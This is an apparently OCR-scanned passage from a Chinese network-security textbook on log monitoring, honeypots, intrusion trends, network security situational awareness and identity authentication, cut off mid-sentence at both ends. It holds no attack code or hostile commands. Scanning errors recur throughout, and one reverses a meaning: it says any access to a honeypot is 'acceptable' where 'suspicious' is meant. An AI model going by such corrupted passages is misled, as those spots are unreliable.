测 通 信 信 息 为 主 的 检测 模式 ,以 及 在 独立 机 器 上 以 监测 网 络 设备 运行 为 目标 的 单机 模式 。 

(3) 日 志文 件 监测 器 (Log File Monitors,LFM) 主 要 用 于 检测 网 络 日 志文 件 内 容 , 这 是 
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一 种 特征 检测 技术 的 典型 应 用 。LFM 通过 将 日 志文 件 内 容 与 关键 字 不 断 匹配 ,获取 入 侵 行 
为 的 存在 。 例 如 ,对 于 HTTP 服务 器 的 日 志文 件 ,只 要 匹配 swatch 关键 字 , 就 能 够 检测 到 
是 否 存在 PHF 攻击 。 

(4) 虚拟 蜜 网 (也 称 为 蜜 饶 系 统 ,honeypots) 是 一 个 包含 若干 漏洞 的 诱骗 系统 。 它 通过 
模拟 一 个 或 多 个 易 受 到 攻击 的 主机 ,为 攻击 者 创造 一 个 极 易 入侵 的 目标 。 由 于 每 个 蜜 钢 并 
无 任何 实际 的 运行 活动 , 故 任何 接 入 都 被 认为 是 可 以 的 。 虚 拟 蜜 网 最 大 的 优势 在 于 , 它 为 真 
实 的 主机 赢得 了 防范 人 侵 的 时 间 ,拖延 攻击 者 对 真实 目标 的 攻击 ;同时 ,诱捕 系统 能 够 不 断 
获得 攻击 者 的 人 侵 行为 ,为 真实 系统 制定 有 效 的 防护 策略 提供 依据 。 


2.3.4 入 侵 检测 的 发 展 方向 


1. 入 侵 技术 的 发 展 变化 

入 侵 技术 的 发 展 与 演化 主要 反映 在 下 列 5 个 方面 。 

(1) 入 侵 或 攻击 的 综合 化 与 复杂 化 。 由 于 网 络 防范 技术 的 多 重 化 ,攻击 的 难度 增加 ,使 
得 入侵 者 在 实施 人 侵 或 攻击 时 往往 同时 采取 多 种 人 侵 手段 ,以 保证 入 侵 的 成 功率 ,并 可 在 攻 
击 实施 的 初期 掩盖 攻击 或 人 侵 的 真实 目的 。 

D 入 侵 主体 对 象 的 间接 化 , 即 实施 入 侵 与 攻击 的 主体 的 隐蔽 化 。 通 过 一 定 的 技术 ,可 
掩盖 攻击 主体 的 源 地 址 及 主机 位 置 。 使 用 了 隐蔽 技术 后 ,对 于 被 攻击 对 象 攻击 的 主体 是 无 
法 直接 确定 的 。 

(3) 入 侵 或 攻击 的 规模 扩大 。 由 于 战争 对 电子 技术 与 网 络 技术 的 依赖 性 越 来 越 大 , 随 
之 产生 发展 .逐步 升级 到 电子 战 与 信息 战 。 对 于 信息 战 ,其 规模 和 技术 与 一 般 意义 上 的 计 
算 机 网 络 的 入侵 与 攻击 不 可 相提并论 。 国 家 主干 通信 网 络 的 安全 与 主权 国家 领土 的 安全 居 
于 同等 地 位 。 

(4) 入 侵 或 攻击 技术 的 分 布 化 。 常 用 的 入 侵 与 攻击 行为 往往 由 单机 执行 。 防 范 技术 的 
发 展 使 得 此 类 行为 不 能 奏效 。 所 谓 的 分 布 式 拒绝 服务 (DDoS) 在 很 短 时 间 内 可 造成 被 攻击 
主机 瘫痪 。 此 类 分 布 式 攻击 的 信息 模式 与 正常 通信 无 差异 ,往往 在 攻击 发 动 的 初期 不 易 被 
确认 。 分 布 式 攻击 是 近期 最 常用 的 攻击 手段 。 

O) 攻击 对 象 的 转移 。 入 侵 与 攻击 常 以 网 络 为 侵犯 的 主体 ,但 近期 的 攻击 行为 却 发 生 
了 策略 性 的 改变 ,由 攻击 网 络 改 为 攻击 网 络 的 防护 系统 。 现 已 有 专门 针对 IDS 作 攻 击 的 报 
道 。 攻 击 者 详细 地 分 析 了 IDS 的 审计 方式 .特征 描述 .通信 模式 ,并 针对 IDS 的 弱点 加 以 
攻击 


2. 入 侵 检测 的 发 展 方向 
人 侵 检测 技术 未 来 的 发 展 方向 包括 以 下 3 个 方面 。 
(1) 分 布 式 人 侵 检 测 。 一 方面 ,针对 分 布 式 网 络 攻击 形成 检测 方法 ; 另 一 个 方面 ,使 用 
分 布 式 的 方法 检测 网 络 攻击 ,涉及 的 关键 技术 为 检测 协同 机 制 与 人 侵 攻 击 的 全 局 信息 提取 。 
(2) 智能 化 入 侵 检测 ,即使 用 智能 化 的 方法 与 手段 进行 人 侵 检测 。 现 阶段 常用 的 智能 
算法 有 神经 网 络 、 遗 传 算法 、 模 糊 技 术 、 免 疫 原 理 等 方法 ,这 些 方法 常用 于 入 侵 特征 的 辨识 与 
泛 化 。 利 用 专家 系统 的 思想 构建 人 侵 检测 系统 也 是 常用 的 方法 之 一 。 
(3) 全 面 的 安全 防御 方案 ,即使 用 安全 工程 风险 管理 的 思想 与 方法 处 理 网 络 安全 问题 ， 
将 网 络 安 全 作为 一 个 整体 工程 处 理 。 从 管理 .网 络 结构 、 加 密 通 道 、 防 火 墙 病 毒 防护 、 入 侵 
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检测 多 方位 对 所 关注 的 网 络 做 出 评估 ,并 提出 可 行 的 解决 方案 。 


2.4 网络 安全 态势 感知 


2.4.1 网 络 安全 态势 感知 的 基本 概念 


1. 态势 感知 

状态 是 指 一 个 物质 系统 中 各 个 对 象 所 处 的 状况 ,由 一 组 测度 表征 。 态 势 是 系统 中 各 个 
对 象 状态 的 综合 ,是 一 个 整体 和 全 局 的 概念 。 任 何 单一 的 情况 和 状态 均 不 能 成 为 态势 , 它 强 
调 系 统 及 系统 中 对 象 之 间 的 关系 。 微 观 而 言 ,表征 状态 的 测度 取 值 依赖 于 对 应 系统 的 要 素 
内 容 , 这 些 要 素 之 间 的 关系 如 图 2. 4. 1 所 示 。 
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图 241 态势 感知 的 认 知 映射 


其 中 ,原始 数据 是 指 传感器 产生 的 未 经 处 理 的 数据 , 它 反映 的 是 原始 数据 的 观测 结果 ; 
信息 是 指 对 原始 数据 进行 有 效 性 处 理 后 得 到 的 数据 记录 ;知识 是 指 采用 相关 技术 识别 出 的 
系统 中 的 活动 内 容 ;理解 是 指针 对 各 个 活动 分 析 得 到 的 其 意图 和 特征 ;状态 评估 是 指 预测 这 
些 活动 对 系统 中 各 个 对 象 所 产生 的 作用 。 

从 图 2.4.1 可 以 看 到 ,感知 是 一 种 “ 认 知 映射 "。 所 谓 认 知 映射 ,是 指 决策 者 采用 数据 融 
合 、 风 险 评 估 及 可 视 化 等 相关 技术 对 不 同 地 点 获得 的 不 同 格式 的 信息 去 噪 、 整 合 ,从 而 得 到 
更 准确 、 更 全 面 的 信息 ,然后 不 断 地 对 这 些 信息 进行 语义 提取 ,识别 出 需要 关注 的 要 素 及 其 
意图 ,决策 者 可 以 实时 有效 地 评估 其 对 系统 产生 的 影响 。 

态势 感知 是 指 在 一 定 的 时 间 和 空间 范围 内 提取 系统 中 的 要 素 ,理解 这 些 要 素 的 含义 ,并 
且 预 测 其 可 能 的 效果 。 可 将 其 概括 为 3 个 层面 :态势 觉察 态势 理解 及 态势 投射 。 根 据 这 个 
定义 ,态势 感知 可 以 理解 为 一 个 认 知 过 程 ,通过 使 用 过 去 的 经 验 和 知识 ,识别 .分 析 和 理解 当 
前 的 系统 状况 。 分 析 人 员 对 当前 的 态势 进行 感知 ,更 新 “状态 知识 ”, 然 后 再 进行 感知 ,最 终 
构成 一 个 循环 的 映射 过 程 。 这 个 映射 过 程 不 是 简单 的 数据 变换 ,而 是 一 种 语义 提取 ,因此 ， 
感知 的 过 程 表现 为 不 断 地 进行 认 知 映射 ,以 获取 更 多 、 更 详细 的 语义 。 态 势 感知 是 一 个 动态 
变化 的 过 程 ,不 同 的 人 由 于 经 验 、 知 识 等 不 同 , 得 到 的 态势 感知 不 尽 相 同 。 

态势 感知 最 早 来 源 于 美国 军 方 在 军事 对 抗 中 的 研究 。 在 军事 术 请 中 ,态势 感知 的 目标 
是 使 指挥 官 了 解 双方 的 情况 ,包括 敌我 的 所 在 位 置 、 当 前 状态 和 作战 能 力 ,以 便 能 做 出 快速 
而 正确 的 决策 ,达到 知己 知 彼 . 百 战 不 列 的 目的 。 
态势 感知 方法 在 战场 指挥 人 机 交互 系统 .战场 认 知 域 
指挥 和 医疗 应 急 调度 等 领域 均 有 应 用 。 

态势 感知 常 被 应 用 在 由 观察 (observe)、 导 
向 (orient) 2 FE (decision) 和 行动 (act) 这 4 阶 
段 构成 的 一 个 控制 过 程 环 中 ( 见 图 2. 4. 2) 。 

OODA 环 描述 了 目的 与 活动 的 感知 过 程 ， 


图 242 OCDA 决 策 模型 
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并 将 感知 循环 过 程 分 为 观察 导向、 决策 行动 这 4 个 阶段 。 其 中 ,观察 实现 了 从 物理 域 跨越 
到 信息 域 ;导向 和 决策 属于 认 知 域 ;行动 实现 信息 域 到 物理 域 的 闭合 ,完成 循环 。 前 3 个 阶 
段 类 似 于 JDL 数据 融合 模型 ;行动 阶段 考虑 了 决策 对 真实 世界 中 的 影响 来 闭合 循环 ,更 适 
用 于 需要 进行 主动 干预 的 环境 中 。 

需要 强调 的 是 ,这 些 研究 得 到 的 并 不 是 态势 感知 模型 ,而 是 态势 感知 应 用 模型 。 态 势 感 
知 的 工作 只 涉及 图 2.4.2 中 认 知 域 的 活动 ,不 涉及 信息 域 和 物理 域 的 活动 。 因 此 ,基于 这 些 
模型 直接 代表 态势 感知 的 概念 是 不 合适 的 。 

2. 网 络 安全 态势 感知 

美国 空军 通信 信息 中 心 的 Tim Bass 于 1999 年 提出 网 络 安全 态势 感知 (Network 
Security Situation Awareness, NSSA) 这 个 概念 ,2000 年 将 该 技术 应 用 于 多 个 NIDS 检测 结 
果 的 数据 融合 分 析 , 主 要 解决 单一 人 侵 检测 系统 无 法 有 效 识别 出 当前 系统 中 存在 的 所 有 攻 
击 活动 及 整个 网 络 系 统 的 安全 态势 的 问题 。 

目前 ,人 们 对 NSSA 的 研究 存在 3 种 观点 : 一 种 观点 认为 NSSA 是 网 络 安全 事件 应 用 
大 数据 处 理 和 可 视 化 技术 的 汇总 结果 ,如 传统 的 安全 服务 提供 商 及 新 出 现 的 重点 关心 高 级 
持续 性 威胁 (Advanced Persistent Threat. APT) 攻 击 的 企业 等 ,通过 公开 一 些 技术 报告 记 
录 APT 的 攻击 实例 ;一 种 观点 认为 NSSA 是 基于 网 络 安全 事件 融合 计算 的 网 络 安全 状态 
量化 表达 ;还 有 一 种 观点 认为 NSSA 作为 一 种 网 络 安全 管理 工具 ,是 网 络 安全 监测 的 一 种 
实现 形式 ,并 提出 了 诸多 模型 。 

NSSA 是 对 网 络 系统 安全 状态 的 认 知 过 程 ,包括 对 从 系统 中 测量 到 的 原始 数据 逐步 进 
行 融合 处 理 和 实现 对 系统 的 背景 状态 及 活动 请 义 的 提取 ,识别 出 存在 的 各 类 网 络 活动 以 及 
其 中 异常 活动 的 意图 ,从 而 获得 据 此 表征 的 网 络 安全 态势 和 该 态势 对 网 络 系统 正常 行为 影 
响 的 了 解 。 

网 络 系统 是 对 各 种 形态 网 络 的 抽象 ,包括 计算 机 互联 网 、 物 联网 以 及 其 他 采用 不 同 通信 
方式 和 终端 类 型 的 网 络 。 测 量 是 对 各 种 网 络 检测 功能 的 抽象 ,包括 网 络 管理 数据 和 网 络 安 
全 监测 数据 。 其 中 ,测量 数据 的 生成 不 是 NSSA 的 任务 ,而 这 些 数据 的 获取 则 是 NSSA 的 
任务 。 这 意味 着 ,NSSA 的 研究 目标 与 研究 内 容 与 网 络 管理 和 网 络 入 侵 检 测 等 这 些 传 统 的 
研究 领域 之 间 有 着 区 分 和 不 同 的 侧重 点 。 背 景 状态 是 系统 当前 所 处 的 运行 状态 ,这 是 动态 
变化 的 ,与 系统 之 前 的 部 署 和 定义 可 能 不 一 致 。“ 安 全 ”只 有 在 动态 的 系统 中 才 有 意义 , 因 
此 ,攻击 活动 及 安全 缺陷 对 系统 的 影响 效果 应 当 基 于 系统 当前 的 状态 进行 判定 。 活 动 语义 
是 系统 中 的 主体 作用 于 客体 的 动作 所 构成 的 序列 ,要 进行 安全 态势 察觉 ,管理 人 员 应 当 了 解 
系统 中 存在 的 所 有 活动 ,不 能 仅 限于 辨识 攻击 活动 , 即 要 辨 清 敌 我 。 响 应 决策 本 身 不 是 
NSSA 的 任务 ,因为 态势 感知 只 是 OODA 的 支撑 技术 。 这 意味 着 ,安全 响应 技术 和 安全 策 
略 管理 技术 等 传统 上 属于 网 络 安全 管理 领域 的 内 容 ,不 属于 网 络 安全 态势 感知 的 研究 范畴 。 

根据 上 述 内 容 ,NSSA 的 任务 包括 网 络 安全 态势 觉察 网络 安全 态势 理解 .网 络 安全 态 
势 投射 3 个 层面 。 其 中 ,态势 觉察 完成 原始 测量 数据 的 融合 .语义 提取 任务 以 及 活动 辨识 任 
务 ; 态 势 理解 完成 这 些 辩 识 出 的 活动 的 意图 理解 任务 ;态势 投射 完成 这 些 活 动 意图 所 产生 的 
威胁 判断 任务 。 一 方面 , 层 与 层 之 间 存 在 依赖 关系 ,如 果 网 络 安全 态势 觉察 和 网 络 安全 态势 
理解 没有 合理 的 结果 ,得 到 网 络 安全 态势 投射 很 可 能 也 是 不 正确 的 或 不 完整 的 ; 另 一 方面 ， 
每 层 的 结果 均 可 独立 呈现 并 直接 使 用 ,以 满足 不 同 的 网 络 安全 管理 需要 。 这 意味 着 网 络 安 

。50 us 


全 态势 感知 的 结果 及 其 表达 方式 具有 和 多样 性 ,蕴含 的 语义 粒度 也 可 以 随 需 求 的 视角 而 不 同 。 
但 是 ,无 论 如 何 , 网 络 安全 态势 感知 的 结果 应 当 是 可 响应 的 ,和 否则 缺乏 实际 意义 。 另 外 ,网 络 
安全 态势 感知 是 一 个 测量 数据 驱动 的 认 知 过 程 、 测 量 数据 的 数量 与 质量 影响 感知 的 结果 。 
网 络 安全 态势 感知 模型 如 图 2. 4. 3 所 示 。 该 模型 包含 网 络 安全 态势 觉察 、 网 络 安全 态 
势 理解 、 网 络 安全 态势 投射 及 可 视 化 等 模块 ,下 面 简 要 概括 各 模块 的 功能 。 
网 络 安 全 
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图 243 网 络 安全 态势 感知 模型 


网 络 安全 态势 觉察 的 主要 任务 是 辨识 出 系统 中 的 活动 ,对 网 络 中 相关 的 检测 设备 与 
管理 系统 产生 的 原始 数据 (raw data) 进 行 降 噪 、 规 范 化 处 理 ,得 到 有 效 信息 ,然后 对 
这 些 信息 进行 关联 性 分 析 ,识别 出 系统 中 有 ”* 谁 (系统 中 的 主体 、 客 体 ) 存 在 ,进一步 
分 辨 出 异常 的 活动 。 
网 络 安全 态势 理解 的 主要 任务 是 在 网 络 安全 态势 觉察 的 基础 上 发 现 攻击 活动 ,理解 
并 关联 攻击 活动 的 语义 ,然后 在 此 基础 上 理解 其 意图 。 
网 络 安全 态势 投射 的 主要 任务 是 在 前 两 步 的 基础 上 分 析 并 评估 攻击 活动 对 当前 系 
统 中 各 个 对 象 的 威胁 情况 。 这 种 投射 包括 发 现 这 些 攻击 活动 在 对 象 上 已 经 产生 和 
可 能 产生 ( 即 预测 ) 的 效果 。 通 过 将 态势 感知 的 结果 投射 到 确定 的 系统 对 象 上 ,可 以 
获得 该 对 象 在 当前 态势 下 的 状态 。 尽 管 要 感知 的 是 系统 中 的 活动 ,但 感知 的 最 终结 
果 应 表达 为 这 些 活动 对 系统 对 象 的 影响 ,不 能 仅 止 于 活动 的 识别 ,因为 系统 因 之 而 
产生 的 反应 是 施加 于 对 象 的 ,而 不 是 直接 施加 于 活动 本 身 。 这 是 一 个 再 认识 的 过 
FE ,融合 从 系统 中 观察 到 的 各 个 对 象 的 状态 ,以 构成 态势 ,再 看 这 个 态势 对 系统 各 个 
对 象 的 意义 。 
可 视 化 模块 在 理想 情况 下 ,网 络 安全 态势 感知 将 网 络 安全 状况 以 可 视 化 的 形式 表示 
成 “ 谁 在 什么 时 候 什 么 地 方 产生 什么 样 的 影响 ”( 即 Who, When, Where, Impact). 
研究 人 员 可 以 观察 在 特定 的 时 间 段 系统 中 某 个 攻击 活动 的 情况 ,也 可 以 观察 所 有 活 
动 的 分 布 情况 ,这 取决 于 具体 的 研究 目标 和 需求 ,其 中 ,Who 是 指 辨识 出 的 系统 中 
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的 攻击 活动 ; When 是 指 攻击 活动 在 时 间 轴 上 的 演化 过 程 (侦查 、 隐 藏 、. 攻 击 、 后 门 利 
HD ; Where 是 指 攻击 活动 的 分 布 ( 即 被 管 网 络 中 的 哪些 主机 和 服务 器 已 被 攻击 ); 
Impact 是 指 攻 击 活动 对 被 管 网 络 造 成 的 影响 ,包括 已 造成 的 影响 和 潜在 的 影响 。 

总 之 ,网 络 安全 态势 感知 的 目标 是 了 解 自己 ,了 解 敌人 (威胁 )。 


2.4.2 网 络 安全 态势 感知 的 相关 技术 


面 对 新 的 安全 形势 ,传统 的 安全 体系 遭遇 瓶颈 ,移动 终端 的 安全 也 成 为 身份 认证 安全 的 
隐患 之 一 ,这 就 需要 企业 在 进一步 提升 安全 运营 水 平 的 同时 ,积极 开展 主动 防御 能 力 的 建 
设 。 在 智能 时 代 安 全 防护 策略 中 ,还 需要 态势 感知 辅助 身份 识别 。 态 势 感知 系统 的 作用 简 
单 来 说 就 是 分 析 安 全 环境 信息 ,快速 判断 当前 及 未 来 形势 ,以 做 出 正确 响应 。 

如 今 “ 态 势 感知 "已 经 成 为 网 络 空 间 安 全 领域 聚焦 的 热点 ,也 成 为 网 络 安全 技术 、 产 品 、 
方案 不 断 创 新 ,发 展 、 演 进 的 汇集 体现 ,更 代表 了 当前 网 络 安 全 攻防 对 抗 的 最 新 趋势 。 

为 了 实时 、 准 确 地 显示 整个 网 络 安全 态势 状况 ,检测 出 潜在 、 恶 意 的 攻击 行为 ,网 络 安全 
态势 感知 要 在 对 网 络 资源 进行 要 素 采集 的 基础 上 ,通过 数据 预 处 理 、 网 络 安全 态势 特征 提 
取 、 态 势 评估 、 态 势 预测 和 态势 展示 等 过 程 完成 ,其 中 涉及 许多 相关 的 技术 问题 。 

1. 数据 融合 技术 

数据 融合 技术 是 一 个 多 级 ,多 层面 的 数据 处 理 过 程 , 按 信息 抽象 程度 可 分 为 从 低 到 高 的 
3 个 层次 : 数据 级 融合 ,特征 级 融合 和 决策 级 融合 。 

网 络 空间 态势 感知 的 数据 来 自 众 多 的 网 络 设备 ,其 数据 格式 、 数 据 内 容 、 数 据 质 量 等 千 
差 万 别 , 存 储 形式 各 异 ,表达 的 语义 也 不 尽 相 同 。 如 果 能 够 对 这 些 使 用 不 同 途 径 、 来 源 于 不 
同 网 络 位 置 ` 具 有 不 同 格式 的 数据 进行 预 处 理 , 并 在 此 基础 上 进行 归 一 化 融合 操作 ,就 可 以 
为 网 络 安全 态势 感知 提供 更 全 面 、 精 准 的 数据 源 , 从 而 得 到 更 准确 的 网 络 态势 。 

2. 数据 清洗 技术 

网 络 安全 态势 感知 将 采集 的 大 量 网 络 设备 的 数据 经 过 数据 融合 处 理 后 ,转化 为 格式 统 
一 的 数据 单元 。 这 些 数 据 单元 数量 庞大 ,携带 的 信息 众多 ,有 用 信息 与 无 用 信息 鱼龙混杂 ， 
难以 辨识 。 因 此 ,要 掌握 相对 准确 .实时 的 网 络 安全 态势 ,必须 剔除 干扰 信息 。 

数据 清洗 技术 从 海量 数据 中 挖掘 出 有 用 的 信息 , 即 从 海量 的 、 不 完全 的 \ 有 噪声 的 、 模 糊 
的 随机 的 实际 应 用 数据 中 发 现 隐 含 的 、 规 律 的、 事先 未 知 的 ,但 又 有 潜在 用 处 的 ,并 且 最 终 
可 理解 的 信息 和 知识 。 

3. 特征 提取 技术 

网 络 安全 态势 特征 提取 技术 是 通过 一 系列 数学 方法 处 理 , 将 大 规模 网 络 安 全 信息 归并 
融合 成 一 组 或 者 几 组 在 一 定 值 域 范围 内 的 数值 ,这 些 数值 具有 表现 网 络 实时 运行 状况 的 一 
系列 特征 ,用 以 反映 网 络 安全 状况 和 受 威胁 程度 等 情况 。 

网 络 安全 态势 特征 提取 是 网 络 安全 态势 评估 和 预测 的 基础 ,对 整个 态势 评估 和 预测 有 
重要 的 影响 。 网 络 安全 态势 特征 提取 方法 主要 有 层次 分 析 法 、 模 糊 层 次 分 析 法 、 德 尔 菲 法 和 
综合 分 析 法 。 

4. 态势 预测 技术 

网 络 安全 态势 预测 就 是 根据 网 络 运行 状况 发 展 变化 的 实际 数据 和 历史 资料 ,运用 科学 
的 理论 ,方法 和 各 种 经 验 、 判 断 、 知 识 推 测 、 估 计 分 析 其 在 未 来 一 定时 期 内 可 能 的 变化 情况 ， 
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是 网 络 安全 态势 感知 的 一 个 重要 组 成 部 分 。 

网 络 在 不 同时 刻 的 安全 态势 彼此 相关 ,安全 态势 的 变化 有 一 定 的 内 部 规律 ,这 种 规律 可 
以 预测 网 络 在 将 来 时 刻 的 安全 态势 ,从 而 可 以 有 预见 性 地 进行 安全 策略 的 配置 ,实现 动态 的 
网 络 安全 管理 ,预防 大 规模 网 络 安全 事件 发 生 。 网 络 安全 态势 预测 方法 主要 有 神经 网 络 预 
测 法 .时 间 序 列 预测 法 和 基于 灰色 理论 预测 法 。 

5. 可 视 化 技术 

可 视 化 技术 是 利用 计算 机 图 形 学 和 图 像 处 理 技术 将 数据 转换 成 图 形 或 图 像 在 屏幕 上 显 
示 出 来 ,并 进行 交互 处 理 的 理论 ,方法 和 技术 。 它 涉及 计算 机 图 形 学 .图 像 处 理 、. 计 算 机 视 
觉 \ 计 算 机 辅助 设计 等 多 个 领域 。 

目前 已 有 很 多 安全 企业 将 可 视 化 技术 和 可 视 化 工具 应 用 于 态势 感知 领域 ,在 网 络 安全 
态势 感知 的 每 一 个 阶段 都 充分 利用 可 视 化 方法 ,将 网 络 安全 态势 合并 为 连贯 的 网 络 安全 态 
势 图 ,快速 发 现 网 络 安 全 威胁 ,直观 把 握 网 络 安全 状况 。 


2.4.3 网 络 安全 态势 感知 的 研究 方向 


由 于 网 络 安全 态势 感知 对 于 网 络 空间 安全 的 重要 性 ,这 个 领域 的 研究 与 应 用 日 益 活跃 。 
例如 ,美国 国土 安全 部 高 级 研究 计划 局 (Homeland Security Advanced Research Projects 
Agency, HSARPA) 于 2013 4 9 月 发 布 的 网 络 空间 安全 战略 研究 计划 中 ,第 3 个 研究 主题 
为 网 络 安全 ,其 中 有 一 个 优先 发 展 方向 为 互联 网 攻击 建 模 。 这 个 优先 发 展 方向 中 有 4 项 任 
务 与 网 络 安全 态势 感知 有 关 , 包 括 开 发 满足 网 络 安 全 态势 感知 需要 的 数据 采集 ,分 类 和 存储 
机 制 ,开发 新 的 网 络 安全 态势 可 视 化 技术 ,支持 跨 域 的 网 络 安全 态势 感知 信息 共享 ,实现 不 
同时 间 粒 度 的 网 络 安全 态势 感知 ,以 满足 从 毫秒 级 攻击 自动 响应 到 APT 检测 的 不 同 需要 。 
这 4 个 任务 体现 了 网 络 安全 态势 感知 的 发 展 方向 ,特别 是 第 4 个 任务 ,很 典型 地 反映 了 网 络 
安全 态势 感知 技术 的 应 用 目标 。 

基于 网 络 安全 态势 感知 基本 概念 以 及 这 个 领域 相关 的 研究 进展 ,该 领域 目前 还 面临 如 
下 一 些 需 要 解决 的 关键 问题 。 

1. 海量 异 构 测量 数据 的 融合 处 理 

网 络 安全 态势 感知 依赖 的 原始 测量 数据 可 以 来 源 于 不 同型 号 .不 同 实现 技术 .不 同 开发 
与 生产 者 的 网 络 运行 管理 系统 、 网 络 安全 管理 系统 .主机 管理 系统 和 应 用 管理 系统 ,这 些 系 
统 产 生 异 构 的 运行 监测 数据 和 日 志 数 据 , 需 要 采用 流 式 数据 处 理 方式 在 不 同 的 时 间 窗 口内 
完成 融合 处 理 任 务 。 目 前 ,这 方面 的 研究 明显 是 不 够 的 , 现 有 的 大 数据 分 析 技 术 虽 然 可 以 提 
供 一 定 的 支持 与 借鉴 ,但 这 些 方法 对 态势 觉察 的 适用 性 还 需要 有 针对 性 的 研究 。 

2. 不 完全 信息 条 件 下 的 活动 辨识 

不 完全 信息 条 件 下 的 活动 辨识 是 指 在 测量 系统 存在 漏 报 \ 误 报 以 及 信息 缺失 的 前 提 下 ， 
如 何 尽 可 能 准确 地 辨识 出 网 络 中 存在 的 活动 。 这 类 研究 可 以 认为 是 源 自 网 络 和 人 侵 检测 领 
域 ,但 在 网 络 安 全 态势 感知 的 范畴 中 被 赋予 了 更 为 广泛 的 含义 。 互 联网 的 流量 具有 重 尾 的 
特性 ,传统 研究 只 关注 流量 行为 的 典型 部 分 和 主要 部 分 ,如 流量 分 类 ,但 在 态势 觉察 中 ,不 仅 
这 些 部 分 需要 关注 ,小 流量 的 零星 行为 也 需要 关注 ,如 APT 检测 ,而 且 不 完全 信息 条 件 下 
这 类 活动 的 辨识 更 困难 。 因 此 ,这 个 领域 需要 更 为 精细 的 测量 数据 关联 性 分 析 方 法 。 
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3. 网 络 活动 的 语义 计算 

目前 的 实践 中 ,网 络 攻击 的 意图 识别 基本 上 是 手工 完成 的 , 即 需要 依靠 人 工 经 验 的 判 
断 。 鉴 于 人 的 能 力 约 束 和 相关 人 力 资源 的 不 足 , 这 种 人 工 实现 方式 给 网 络 安全 态势 感知 的 
大 规模 应 用 带 来 极 大 的 限制 。 因 此 ,很 有 必要 研究 网 络 活动 特征 提取 和 意图 识别 的 机 器 处 
理 方法 ,以 提高 网 络 安全 态势 感知 系统 的 自治 能 力 。 

4. 网 络 态势 的 可 视 化 

网 络 安全 态势 感知 处 理 的 海量 异 构 测 量 数 据 及 其 处 理 结果 需要 有 合适 的 表示 方式 表达 
和 应 用 ,可 视 化 技术 是 一 个 公认 的 可 行 支持 。HSARPA 在 它 的 战略 研究 计划 中 也 提 到 需 
要 研究 可 扩展 的 可 视 化 方法 来 支持 态势 感知 数据 的 使 用 ,包括 带 准 确 地 理 定位 的 可 视 化 方 
法 ,支持 Drill-down 的 可 视 化 分 析 方 法 ,以 及 适合 不 同 用 户 使 用 和 表达 不 同 内 容 的 可 视 化 
技术 。 

S. 网 络 安全 态势 感知 的 协同 

网 络 空间 安全 需要 全 球 合作 ,至 少 在 国家 的 层面 要 求 合 作 的 网 络 安全 态势 感知 系统 之 
间 具 有 协同 能 力 , 就 像 HSARPA 规划 中 要 求 的 那样 。 如 果 参 照 网 络 和 人 侵 检测 领域 的 相关 
研究 ,对 于 合作 机 制 的 要 求 至 少 包 括 配置 互 操作 性 ( 即 合作 各 方 具 有 信息 交换 能 力 ) ,需要 有 
类 似 SNMP 和 IPFIX 这 样 的 标准 协议 ;共享 信息 的 语法 互 操作 性 ,需要 有 类 似 IDMEF 的 
标准 数据 结构 以 及 语义 互 操作 性 ,如 描述 网 络 安 全 态势 的 标准 测度 及 其 取 值 ,这 在 网 络 入 侵 
检测 领域 还 是 空白 。 此 外 , 巾 于 合作 各 方 可 能 存在 信息 访问 限制 ,如 何 实现 信息 共享 与 隐私 
保护 的 平衡 把 握 , 是 需要 研究 的 问题 。 

6. 态势 投射 方法 的 完善 

目前 的 态势 投射 方法 基本 都 是 静态 的 ,不 能 适应 网 络 安全 态势 感知 的 过 程 需要 ,因此 需 
要 研究 相应 的 动态 态势 投射 方法 。 例 如 ,基于 非 合 作 不 完全 信息 动态 博弈 理论 设计 附带 预 
警 能 力 的 态势 投射 方法 。 

网 络 安全 态势 感知 是 网 络 安全 领域 的 研究 热点 ,尽管 已 经 得 到 较 长 时 间 的 关注 ,但 仍 未 
形成 完整 的 体系 和 明确 一 致 的 目标 。 在 现 有 的 网 络 安全 态势 感知 的 研究 中 ,将 其 视 为 网 络 
安全 事件 应 用 大 数据 处 理 和 可 视 化 技术 的 汇总 结果 的 观点 和 将 其 视 为 基于 网 络 安全 事件 融 
合计 算 的 网 络 安全 状态 量化 表达 的 观点 ,都 没有 完整 地 反映 其 目标 和 任务 。 将 其 视 为 网 络 
安全 监测 实现 形式 的 观点 则 不 够 准确 。 网 络 安全 态势 感知 包括 网 络 安全 态势 觉察 .网 络 安 
全 态势 理解 和 网 络 安全 态势 投射 3 个 层面 ,是 一 个 完整 的 认 知 过 程 。 它 不 是 将 网 络 中 的 安 
全 要 素 进行 简 单 的 汇总 和 又 加 ,而 是 根据 不 同 的 用 户 需 求 , 以 一 系列 具有 理论 支撑 的 模型 为 
支持 , 找 出 这 些 安全 要 素 之 间 的 内 在 关系 ,实时 地 分 析 网 络 的 安全 状况 。 


2.5 ”网络 认证 技术 


网 络 认证 技术 是 网 络 安 全 技术 的 重要 组 成 部 分 之 一 。 认 证 指 的 是 证 实 被 认证 对 象 是 否 
属实 和 是 否 有 效 的 一 个 过 程 。 其 基本 思想 是 通过 验证 被 认证 对 象 的 属性 达到 确认 被 认证 对 
象 是 否 真实 有 效 的 目的 。 被 认证 对 象 的 属性 可 以 是 口令 、 数 字 签 名 或 者 像 指 纹 、 声 音 、 视 网 
膜 这 样 的 生理 特征 。 认 证 常常 被 用 于 通信 双方 相互 确认 身份 ,以 保证 通信 安全 。 认 证 可 采 
用 各 种 方法 进行 。 
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2.5.1 身份 认证 


身份 认证 技术 简单 意义 上 来 讲 就 是 对 通信 双方 进行 真实 身份 鉴别 ,也 是 对 网 络 信息 资 
源 安全 进行 保护 的 第 一 个 防火 墙 ,目的 是 验证 辨别 网 络 信息 使 用 用 户 的 身份 是 否 具有 真实 
性 和 合法 性 ,然后 给 予 授权 才能 访问 系统 ,不 能 通过 识别 用 户 就 会 阻止 其 访问 。 由 此 可 知 
身份 认证 在 安全 管理 中 是 一 个 重点 ,同时 也 是 最 基础 的 安全 服务 。 身 份 认 证 技术 在 以 后 的 
发 展 里 ,首先 需要 加 强 其 安全 性 稳定 性、 实用 性 等 特点 ,在 认证 终端 需要 向 小 型 化 发 展 。 身 
份 认 证 重点 从 以 下 几 个 方面 发 展 。 

1. 生物 认证 技术 

生物 特征 指 的 是 人 体 自 带 的 生理 特征 和 行为 特征 。 因 为 每 个 人 的 生物 特征 具有 唯一 
性 ,由 此 对 用 户 进 行 验证 。 生 物 特征 的 身份 认证 方法 有 可 靠 、 稳 定 等 特点 ,也 是 最 安全 的 身 
